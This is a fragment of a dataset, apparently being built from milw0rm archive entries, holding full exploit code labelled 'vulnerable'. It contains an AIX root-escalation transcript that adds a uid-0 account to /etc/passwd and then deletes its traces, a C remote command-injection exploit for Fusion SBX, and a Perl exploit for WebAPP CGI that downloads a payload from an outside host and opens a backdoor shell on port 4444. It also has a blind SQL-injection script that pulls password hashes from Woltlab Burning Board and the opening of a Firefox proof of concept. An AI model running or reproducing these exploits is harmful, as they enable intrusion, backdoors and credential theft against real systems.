variable.\n\n-bash-2.05b$ id\n\nuid=201 gid=1(staff)\n\n-bash-2.05b$ ls -l /etc/passwd\n\n-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd\n\n-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> 
/etc/passwd\n\n-bash-2.05b$ cat /etc/passwd\n\nroot:!:0:0::/:/usr/bin/ksh\n\ndaemon:!:1:1::/etc:\n\nbin:!:2:2::/bin:\n\nsys:!:3:3::/usr/sys:\n\nadm:!:4:4::/var/adm:\n\nuucp:!:5:5::/usr/lib/uucp:\n\nguest:!:100:100::/home/guest:\n\nnobody:!:4294967294:4294967294::/:\n\nlpd:!:9:4294967294::/:\n\nlp:*:11:11::/var/spool/lp:/bin/false\n\ninvscout:*:200:1::/var/adm/invscout:/usr/bin/ksh\n\nnuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico\n\nsnapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd\n\nimnadm:*:188:188::/home/imnadm:/usr/bin/ksh\n\ncloud:!:0:1::/home/cloud:/usr/local/bin/bash\n\ntest:!:201:1::/home/cloud:/usr/local/bin/bash\n\n\n\n\n\n-bash-2.05b$ su cloud\n\ncloud's Password:\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b# ls -l /etc/passwd\n\n-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd\n\nbash-2.05b# cp /tmp/passwd /etc/passwd\n\nbash-2.05b# chown root /tmp/passwd\n\nbash-2.05b# ls -l /tmp/passwd\n\n-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd\n\nbash-2.05b# id\n\nuid=0(root) gid=1(staff)\n\nbash-2.05b#\n\nbash-2.05b# rm /tmp/.bel*\n\nbash-2.05b# rm /tmp/passwd\n\nbash-2.05b#\n\n\n\n\n\n# milw0rm.com [2005-05-19]", + "vulnerable": true + }, + { + "exploit_id": 1003, + "content": "/*****************************************************\n\n* *\n\n* [Fusion SBX <= 1.2] exploit *\n\n* *\n\n* sileFSBXxpl *\n\n* *\n\n* This exploit use vulnerability found into *\n\n* Fusion SBX and create new variable and call it *\n\n* with a malicious function (stored in config.php). *\n\n* This exploit utilize injection of three diverse *\n\n* procedures for execution of arbitrary code on *\n\n* vulnerable machine with httpd privileges. 
*\n\n* *\n\n* References: www.securityfocus.org/bid/13575 * \n\n* *\n\n* coded by: Silentium of Anacron Group Italy *\n\n* date: 10/05/2005 *\n\n* e-mail: anacrongroupitaly[at]autistici[dot]org *\n\n* my_home: www.autistici.org/anacron-group-italy *\n\n* *\n\n* this tool is developed under GPL license *\n\n* no(c) .:. copyleft *\n\n* *\n\n*****************************************************/\n\n\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\n#define PORT 80\t\t// port of web server \n\n\n\nvoid info(void);\n\nvoid banner(void);\n\nvoid sendxpl(FILE *out, char *argv[], int type);\n\nvoid errsock(void);\n\nvoid errgeth(void);\n\nvoid errconn(char *argv[]);\n\n\n\n\n\nint main(int argc, char *argv[]){\n\n\n\nFILE *out;\n\nint sock, sockconn, type;\n\nstruct sockaddr_in addr;\n\nstruct hostent *hp;\n\n\n\nif(argc!=4)\n\n info();\n\n\n\ntype = atoi(argv[3]);\n\n\n\nif(type < 1 || type > 3)\n\n info();\n\n\n\nbanner();\n\n \n\nif((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)\n\n errsock();\n\n \n\n printf(\"[*] Creating socket\t\t[OK]\\n\");\n\n\n\nif((hp = gethostbyname(argv[1])) == NULL)\n\n errgeth();\n\n \n\n printf(\"[*] Resolving victim host\t[OK]\\n\");\n\n \n\nmemset(&addr,0,sizeof(addr));\n\nmemcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);\n\naddr.sin_family = AF_INET;\n\naddr.sin_port = htons(PORT);\n\n \n\nsockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));\n\nif(sockconn < 0)\n\n errconn(argv);\n\n \n\n printf(\"[*] Connecting at victim host [OK]\\n\");\n\n \n\nout = fdopen(sock,\"a\");\n\nsetbuf(out,NULL);\n\n\n\nsendxpl(out,argv,type);\n\n\n\n printf(\"[*] Now test at execute code on\\n\\n\" \n\n \"[1] %s%sindex.php?sile=id\\n\"\n\n \"[2] %s%sadmin/index.php?sile=id\\n\\n\",argv[1],argv[2],argv[1],argv[2]);\n\n\n\nshutdown(sock,2);\n\nclose(sock);\n\n\n\nreturn 0;\n\n\n\n}\n\n\n\n\n\nvoid info(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"\\n #########################################\\n\"\n\n \" # 
sileFSBXxpl #\\n\"\n\n \" # ################################### #\\n\"\n\n \" # Fusion SBX <= 1.2 exploit #\\n\"\n\n \" # Remote Command Execution #\\n\"\n\n \" # coded by Silentium #\\n\" \n\n \" # [ Anacron Group Italy ] #\\n\"\n\n \" # ################################### #\\n\"\n\n \" # www.autistici.org/anacron-group-italy #\\n\"\n\n \" #########################################\\n\\n\"\n\n \" [Usage]\\n\\n\" \n\n \" sileFSBXxpl \\n\\n\"\n\n \" [Type]\\n\\n\"\n\n \" 1) injection of system()\\n\"\n\n \" 2) injection of exec()\\n\"\n\n \" 3) injection of passthru()\\n\\n\"\n\n \" [Example]\\n\\n\"\n\n \" sileFSBXxpl www.victim.com /sbx/ 1\\n\\n\"); \n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid banner(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[-] sileFSBXxpl\\n\"\n\n \" ============\\n\"\n\n \"[-] Fusion SBX <= 1.2 exploit\\n\"\n\n \"[-] coded by Silentium - Anacron Group Italy\\n\"\n\n \"[-] www.autistici.org/anacron-group-italy\\n\\n\");\n\n \n\n}\n\n \n\n\n\nvoid sendxpl(FILE *out, char *argv[], int type){\n\n\n\nchar *call;\n\nint size = 245;\n\n\n\nif(type == 1)\n\n call = \"system\";\n\nelse if(type == 2)\n\n call = \"exec\";\n\nelse if(type == 3)\n\n call = \"passthru\";\n\n\n\nsize+=strlen(call);\n\n \n\nfprintf(out,\"POST %sadmin/?settings HTTP/1.0\\n\"\n\n \"Connection: Keep-Alive\\n\"\n\n \"Pragma: no-cache\\n\"\n\n \"Cache-control: no-cache\\n\"\n\n \"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\\n\"\n\n \"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\\n\"\n\n \"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\\n\"\n\n \"Accept-Language: en\\n\"\n\n \"Host: %s\\n\"\n\n \"Content-Type: application/x-www-form-urlencoded\\n\"\n\n \"Content-Length: %d\\n\\n\"\n\n \"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&\"\n\n \"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess\"\n\n \"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1\"\n\n 
\"&setsubmit=Commit+Changes&is_logged=1\\n\\n\",argv[2],argv[1],size,call);\n\n \n\n printf(\"[*] Sending exploit\t\t[OK]\\n\\n\");\n\n\n\n}\n\n \n\n \n\nvoid errsock(void){\n\n\n\nsystem(\"clear\");\n\nprintf(\"[x] Creating socket\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errgeth(void){\n\n\n\nprintf(\"[x] Resolving victim host\t[FAILED]\\n\\n\");\n\nexit(1);\n\n\n\n}\n\n\n\n\n\nvoid errconn(char *argv[]){\n\n\n\nprintf(\"[x] Connecting at victim host\t[FAILED]\\n\\n\",argv[1]);\n\nexit(1);\n\n\n\n}\n\n\n\n// milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1004, + "content": " \n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1005, + "content": "!/usr/bin/perl\n\n#################################################################\n\n# T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m #\n\n#################################################################\n\n# Remote C0mmand Executing Expl0it - For WebAPP CGI\n\n#\n\n#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );\n\n#E-Mail : Alpha_Programmer@Yahoo.com\n\n# Trapset_Sec@Yahoo.Ca\n\n#This xpl Open a Backdoor in 4444 Port with Nobody Access !!! 
All Of The *NIX OS that Have UnPatch\n\n#apage.cgi is Vulnerable in this M0ment !!\n\n#\n\n#################################################################\n\n# Gr33tz To ==> AlphaST.Com , Crouz.Com , Simorgh-ev.Com And MH_P0rtal , Oil_Krachack #\n\n#################################################################\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n print \"\\n==============================================\\n\";\n\n print \" \\n WebAPP CGI Exploit By Alpha_Programmer \\n\\n\";\n\n print \" Trap-Set Underground Hacking Team \\n\\n\";\n\n print \" Usage: \\n\\n\";\n\n print \"==============================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \" WebApp.pl www.Host.com /cgi-bin/ \\n\";\n\n exit();\n\n}\n\n\n\n\n\n$serv = $ARGV[0];\n\n$serv =~ s/http:\\/\\///ge;\n\n\n\n$dir = $ARGV[1];\n\n\n\n$cmde = \"cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt\";\n\n\n\n$cmde =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req = \"GET http://$serv\";\n\n$req .= \"$dir\";\n\n$req .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\nprint $sock $req;\n\nprint \"\\nPlease Wait ...\\n\\n\";\n\nsleep(3000);\n\nclose($sock);\n\n\n\n$sock2 = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\n\n\n$cmde2 = \"cd /tmp;cp alpha.txt alpha.pl;chmod 777 sirus.pl;perl sirus.pl\";\n\n\n\n$cmde2 =~ s/ /\"\\$IFS\"/ge;\n\n\n\n$req2 = \"GET http://$serv\";\n\n$req2 .= \"$dir\";\n\n$req2 .= \"apage.cgi?f=file.htm.|echo\\$IFS\\\"_N_\\\";$cmde2;echo\\$IFS\\\"_T_\\\"| HTTP/1.0\\n\\n\";\n\n\n\nprint $sock2 $req2;\n\nprint \"\\n\\n$$$ OK -- Now Try: Nc -v www.host.com 4444 $$$\\n\";\n\nprint \"$$ if This Port was Close , This mean is That , You Hav'nt Permission to Write in /TMP $$\\n\";\n\n\n\n### EOF 
###\n\n\n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + "exploit_id": 1006, + "content": "#!/usr/bin/perl\n\n\n\nuse strict;\n\nuse IO::Socket::INET;\n\n\n\n\n\n$| = print \"\n\nWoltlab Burning Board <= 2.3.1 Exploit\n\nVulnerability discovered by GulfTech Security Research\n\nVisit www.security-project.org\n\nExploit by deluxe89\n\n----------\n\n\";\n\n\n\n\n\n\n\nmy $host = 'www.security-project.org';\n\nmy $path = '/wbb2/'; # path to the board\n\nmy $userid = 1; # the password hash will be from the user with this id\n\nmy $username = 'deluxe89'; # any username from the board\n\nmy $proxy = ''; # proxy, you can leave this empty\n\nmy $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards\n\n\n\n\n\n# proxy handling\n\nmy ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);\n\nif($proxy ne '')\n\n{\n\n print \"[~] Using a proxy\\n\";\n\n}\n\nelse\n\n{\n\n print \"[~] You're using NO proxy!\\n\";\n\n sleep(1);\n\n}\n\n\n\n\n\n\n\n\n\n\n\n#\n\n# Get the hash\n\n#\n\n\n\nprint \"[~] Getting the hash. 
Please wait some minutes..\\n[+] Hash: \";\n\n\n\n\n\nmy $hash = '';\n\nfor(my $i=1;$i<33;$i++)\n\n{\n\n my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');\n\n\n\n if(&test($i, 96)) # buchstabe\n\n {\n\n for(my $c=97;$c<103;$c++)\n\n {\n\n if(&test($i, $c, 1))\n\n {\n\n print pack('c', $c);\n\n last;\n\n }\n\n }\n\n }\n\n else # zahl\n\n {\n\n #print \"0-4\\n\";\n\n for(my $c=48;$c<58;$c++)\n\n {\n\n if(&test($i, $c, 1))\n\n {\n\n print pack('c', $c);\n\n last;\n\n }\n\n }\n\n }\n\n}\n\nprint \"\\n\";\n\n\n\n\n\nsub test\n\n{\n\n my ($i, $num, $g) = @_;\n\n\n\n my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');\n\n my $value = \"sre4sdffr\\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))\";\n\n $value .= ($g) ? '=' : '>';\n\n $value .= \"$num)/*\";\n\n my $data = \"r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed\";\n\n\n\n print $sock \"POST http://$host${path}register.php HTTP/1.1\\r\\nHost: $host\\r\\nConnection: Close\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".length($data).\"\\r\\n\\r\\n$data\\r\\n\";\n\n\n\n\n\n while(<$sock>)\n\n {\n\n if($_ =~ m/$error/) { return 1; }\n\n }\n\n return 0;\n\n}\n\n\n\n# milw0rm.com [2005-05-20]", + "vulnerable": true + }, + { + 
"exploit_id": 1007, + "content": "\n\n\n\nFirelinking 2 - Proof-of-Concept by mikx\n\n\n\n<-- This PoC is cross platform : On Windows this example creates the file -->\n\n<-- c:\\booom.bat and launches it (opens a dos box with a dir command). On -->\n\n<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->\n\n<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->\n\n<-- run twice in some cases (this will create an additional booom-1.txt). -->\n\n\n\n \n\n\n\n\n\n\n\n
\n\n\n\n
Firelinking 2 - Proof-of-Concept
\n\n

\n\n
\n\n
\n\n\n\n